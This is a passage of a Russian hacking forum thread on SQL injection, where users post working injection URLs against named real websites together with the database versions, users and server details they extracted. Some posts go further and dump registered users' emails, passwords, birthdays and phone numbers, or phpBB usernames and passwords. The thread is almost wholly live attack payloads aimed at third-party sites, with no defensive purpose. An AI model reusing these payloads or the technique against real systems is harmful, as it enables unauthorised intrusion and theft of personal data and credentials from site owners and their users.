SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.zucchicollection.org/pages/master.php?id=-32+union+select+1,2,3,version(),5,6,7--
     
    1 person likes this.
  2. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.msk-beauty.ru/news.html?id=-102+and+1=2+union+all+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),5,6,7,8,9,10--+
    version : 5.0.90-log
    user : [email protected]
    database : u50785_bttop
    os : portbld-freebsd7.2
     
  3. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.cyberbody.ru/shop.php?brandid=-2+union+all+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3--+
     
  4. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://tsp-shop.ru/vendors/?vendor=-2+union+all+select+1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13+--+
    version : 4.1.25-log
    user : tspshop@localhost
    database : wwwtspshopru
    os : portbld-freebsd6.2
     
  5. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    PHP:
    http://www.pharm-system.com/index.phtml?page=news&id=-1 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8--
    Host IP: 62.149.0.14
    Web Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8e DAV/2 PHP/5.2.12 with Suhosin-Patch
    Powered-by: PHP/5.2.12
    DB Server: MySQL >=5
    Current DB: pharm_system ;)


    PHP:
    http://director-online.com/buildArticle.php?id=1154  UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8--
    PHP:
    http://www.helilooja.ee/liikmed.php?pid=106 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11,12--
     
    #11865 KENT1994, 23 Apr 2010
    Last edited: 23 Apr 2010
    1 person likes this.
  6. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    milegyek.hu
    Code:
    http://www.milegyek.hu/open.php?id=-283+union+select+1,2,3,user(),version(),database(),7,8,9,10,11,12,13,14--
    User:saldoweb@localhost
    Database:milegyek_hu
    Version:5.1.37-1ubuntu5.1
    PR5



    ukrfoto.dp.ua
    Code:
    http://ukrfoto.dp.ua/download.php?id=283+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())--
    User:saldoweb@localhost
    Database:ukrfoto_dp
    Version:4.1.25



    dnsteel.com.ua
    Code:
    http://dnsteel.com.ua/index.php?id=-283+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
    User:dnsteel@localhost
    Database:dnsteel
    Version:5.0.86
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    uk
    Code:
    http://www.philatelic-traders-society.co.uk/browse.php?detail=92+union+select+1,concat(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    version - 5.0.27
    db - pts
    user - pts@localhost
    Code:
    http://www.bbimages.co.uk/product_detail.php?prod_id=374&store_cat_id=-16+union+select+1,2,3,version(),5,6,7,8,9--
    version - 4.1.22
    db - bbi001
    user - bbi001user@localhost
    Code:
    http://www.tko-sports.co.uk/product_details.php?prod_id=-9+union+select+1,2,3,concat(database(),version(),user()),5,6,7,8,9,10--
    
    version - 5.0.45
    db - Research1
    user - [email protected]
    Code:
    http://www.machinz.co.uk/Productview.php?product=-1+union+select+1,concat%28database%28%29,version%28%29,user%28%29%29--
    version - 5.0.90-community
    db - privile1_machinzdb
    user - privile1_machinz@localhost

    Code:
    http://www.imageculture.co.uk/product.php?prod_id=-1+union+select+concat(database(),version(),user()),2--
    version - 5.0.77
    db - brentwood
    user - client@localhost
     
    2 people like this.
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://lib.prometey.org/?cat_id=-1+AND+1=2+UNION+SELECT+1,2,3,4,5,6+from+user--+

    version : 5.0.67-community
    user : ---------
    database : --------
    os : pc-linux-gnu
     
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    https://fonic.chriskeim.com/B2CPortal/cp_productcard.asp?PageNo=PRODUCTCONFIG&MasterId=103706%27%20or%201=convert%28int,%28SELECT%20@@version%29%29--
    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
     
  10. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    telspravka.com
    Code:
    http://ustilimsk.telspravka.com/fam.php?id=-283+union+select+1,concat_ws(0x3a,user(),database(),version())--
    User: u_telspravka@localhost
    Database: telspravka
    Version: 4.1.22-log


    yp.md
    Code:
    http://www.yp.md/news2/news.php?id=-283+union+Select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13--
    User: ypmd_tester@localhost
    Database: ypmd_test
    Version: 5.0.90-community-log
     
  11. Dima X

    Dima X Member

    Joined:
    14 Dec 2008
    Messages:
    28
    Likes Received:
    13
    Reputations:
    0
    Банковская олимпиада banksbattle.ru (banksbattle.ane.ru)

    HTML:
    http://banksbattle.ane.ru/333.php?archiv=2+union+select+1,concat(email,char(47),pass,char(47),birthday1,char(47),phone_number,char(47),city),concat(f,char(47),i,char(47),o),concat(preferable_act_types,char(47),future_achiev),5,6+from+users--
    USERNAME:
    banks@localhost
    DBNAME:
    banksbattle
    TABLES:
    admins,news,presentation,team_road,users

    Поля в таблице users совпадают с названиями в регистрации
    (например, f - фамилия, i - имя, phone_number - номер телефона)
     
    #11871 Dima X, 24 Apr 2010
    Last edited: 25 Apr 2010
    1 person likes this.
  12. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://www.jlgolf.co.uk/product.php?prod_id=-1+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--
    
    Version: 4.1.19-standard-log
    Database: jlgolf
    User: jlgolf@localhost

    Code:
    http://www.bobsgunshop.com/listings.php?id=120+union+select+1,2,version(),4,5,6/*
    Version: : 4.0.25
    Database: bobsguns
    Code:
    http://www.melaniefoster.co.uk/category.php?categoryID=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),user(),database()),10,11--
    Version: 5.1.26-rc-5.1.26rc
    Database: db62601_melaniefoster
    User: [email protected]
     
    1 person likes this.
  13. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    thebigspur.com PR-5

    Code:
    http://thebigspur.com/extras/gallery_image.php?image_id=-3131+union+all+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12+--+
    Code:
    5.0.90-rs:bigspur_cont_p@localhost:bigspurcontent

    crimsonconfidential.com PR-5

    Code:
    http://crimsonconfidential.com/extras/gallery_image.php?image_id=-42+union+all+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12+--+
    Code:
    5.0.90-rs:crimson_cont_p@localhost:crimsoncontent
     
    2 people like this.
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://edukey.ru/page.php?type=providers&id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
    5.0.67-log

    Code:
    http://www.parfumprestige.ru/new.phtml?idparfum=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
    5.0.26-lk-log

    Code:
    http://www.sexvideogid.ru/my/cart/add.php?id=1105+and+substring(version(),1,1)=5--+&kind=DVD
    
    Code:
    @@tmpdir: /tmp
    database(): sexvg
    version(): 5.1.33-log
    @@version_compile_os: pc-linux-gnu
    user(): susus@localhost
    @@basedir: /usr/local/mysql/
    @@datadir: /usr/local/mysql/var/
    
     
    #11874 Pashkela, 25 Apr 2010
    Last edited: 25 Apr 2010
  15. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.pharmabort.ru/page.php?id=-1+union+/*!select*/+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),6,7,8,9,10,11,12,13,14,15+--
    version : 5.0.87
    user : pharmabort@zvm7
    database : pharmabort
    os : zportbld-freebsd6
     
  16. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.infokon.ru/smallitems.php?nid=-14+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71)--
    version : 5.0.82-log
    user : [email protected]
    database : infokon
    os : unknown-linux-gnu
     
  17. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Host IP: 69.89.31.167
    Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
    Powered-by: PHP/5.2.13
    DB Server: MySQL unknown ver ;)


    Host IP: 80.86.198.13
    Web Server: Apache/2
    DB Server: MySQL >=5
     
    #11877 KENT1994, 25 Apr 2010
    Last edited: 25 Apr 2010
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.kolizey.spb.ru/description.php?id=-803+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,@@version,user(),database(),@version_compile_os),18+--
    version : 4.0.27-max-log
    user : [email protected]
    database : kolizey5
    os : unknown-freebsd4.7
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.softzavod.ru/full.php?id=64517'+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1,1--+



    Database Version: 5.1.32-log
    Database name: mirsofta_sz
    User name: mirsofta_sz@localhost
    Os : portbld-freebsd7.0
     
    1 person likes this.
  20. Agel Nash

    Agel Nash New Member

    Joined:
    23 Jul 2009
    Messages:
    12
    Likes Received:
    4
    Reputations:
    5
    Официальный сайт Валерии
    PHP:
    http://valeriya.net/myblog/records/?&lang=rus&id=000000006+UNION+SELECT+1,2,33,4,username,6,convert(user_password+using+cp1251),9+FROM+phpbb_users--
     
Thread Status:
Not open for further replies.